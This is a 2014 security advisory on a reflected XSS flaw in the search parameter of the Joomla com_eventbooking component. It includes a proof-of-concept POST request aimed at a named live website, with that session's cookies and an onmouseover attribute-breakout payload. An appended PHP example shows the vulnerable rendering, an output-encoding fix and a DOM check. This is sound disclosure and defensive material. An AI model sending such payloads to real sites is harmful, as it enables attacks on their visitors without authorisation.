##################################################################################################
#Exploit Title : Joomla com_eventbooking component XSS vulnerability
#Author : Jagriti Sahu AKA incredible
#Download Link : https://github.com/Jasonudoo/platform/tree/master/components/com_eventbooking
#Date : 13/11/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mrudula and Harry
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
The Joomla component com_eventbooking does not filter the data passed in its search parameter
and is therefore affected by a reflected XSS vulnerability.
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
The vulnerability is caused by the search parameter submitted from the search box, which is reflected into the page unencoded and is therefore prone to XSS.
////////////////
/// POC ////////
////////////////
POC image=http://oi61.tinypic.com/aol6qc.jpg
http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101
POST /index.php?option=com_eventbooking&Itemid=101 HTTP/1.1
Host: eastvicevents.com.au
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://eastvicevents.com.au/index.php?option=com_eventbooking&Itemid=101
Cookie: 230d19898da30be54648f536cbac3652=ca2096bf2055cf7c31462f8f056f84d4; __utma=222259084.1320908457.1415891642.1415891642.1415891642.1; __utmb=222259084.18.10.1415891642; __utmc=222259084; __utmz=222259084.1415891642.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

search=test" onmouseover=prompt(String.fromCharCode(120,115,115,32,116,101,115,116,105,110,103));//&category_id=13&location_id=474&option=com_eventbooking&Itemid=101&view=search

HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Thu, 13 Nov 2014 16:10:17 GMT
Server: LiteSpeed
X-Powered-By: PHP/5.5.18
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: close
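The following is an added example, not code from the com_eventbooking component or from the advisory author. It reproduces the pattern described above (a search term reflected into an input's value attribute without encoding) next to the output-encoding fix, and checks both through a DOM parse rather than a string grep. The rendering functions are assumptions about what such a search view does; the request body is a constructed sample shaped like the PoC, with the payload shortened. Note that a tag-stripping input filter (such as Joomla's string filter) does not help here: the payload contains no tag, only a quote that closes the attribute, so the fix has to be output encoding at the point of reflection.

```php
<?php
// Added example, not code from the com_eventbooking component. It reproduces the
// pattern this advisory describes (a search term reflected into an input's value
// attribute without encoding) and shows the output-encoding fix. The rendering
// functions are assumptions about what such a view does; the request body is a
// constructed sample shaped like the PoC above.

// Constructed sample request body (same parameter names as the PoC, shortened payload).
$body = 'search=test" onmouseover=prompt(1);//&category_id=13&location_id=474';
$post = array();
parse_str($body, $post);

// VULNERABLE: the raw parameter goes straight into a double-quoted attribute.
// The payload's own " closes value="test" and everything after it is parsed as
// a new attribute, here an onmouseover event handler.
function renderSearchBoxVulnerable(array $post)
{
    $search = isset($post['search']) ? $post['search'] : '';
    return '<input type="text" name="search" value="' . $search . '" />';
}

// HARDENED: encode for the HTML attribute context before echoing. ENT_QUOTES
// converts both " and ' to entities, so the browser keeps the entire string
// inside the value attribute and never sees a second attribute.
// (Inside a Joomla view template, $this->escape($search) serves the same purpose.)
function renderSearchBoxSafe(array $post)
{
    $search = isset($post['search']) ? $post['search'] : '';
    $escaped = htmlspecialchars($search, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="search" value="' . $escaped . '" />';
}

// Parse the markup the way a browser would and return the input's attributes.
// Checking the resulting DOM matters: a grep for "onmouseover=" would match the
// safe output too, because the text is still present there, only as attribute
// content instead of a separate attribute.
function inputAttributes($html)
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    $attrs = array();
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            $attrs[$attr->name] = $attr->value;
        }
    }
    return $attrs;
}

// Flag any attribute whose name starts with "on": that is an event handler the
// template never wrote, i.e. evidence of an attribute break-out.
function hasInjectedHandler(array $attrs)
{
    foreach (array_keys($attrs) as $name) {
        if (stripos($name, 'on') === 0) {
            return true;
        }
    }
    return false;
}

$renderings = array(
    'vulnerable' => renderSearchBoxVulnerable($post),
    'safe'       => renderSearchBoxSafe($post),
);
foreach ($renderings as $label => $html) {
    $attrs = inputAttributes($html);
    printf("%-10s %s\n", $label, $html);
    printf("%-10s attributes: %s\n", '', implode(', ', array_keys($attrs)));
    printf("%-10s injected handler: %s\n\n", '', hasInjectedHandler($attrs) ? 'yes' : 'no');
}
```

Run with `php example.php`: the vulnerable rendering yields four attributes (type, name, value, onmouseover), the hardened one yields three, with the whole payload held inside `value`. The same DOM-based check can be pointed at a captured response body when verifying a fix to this component.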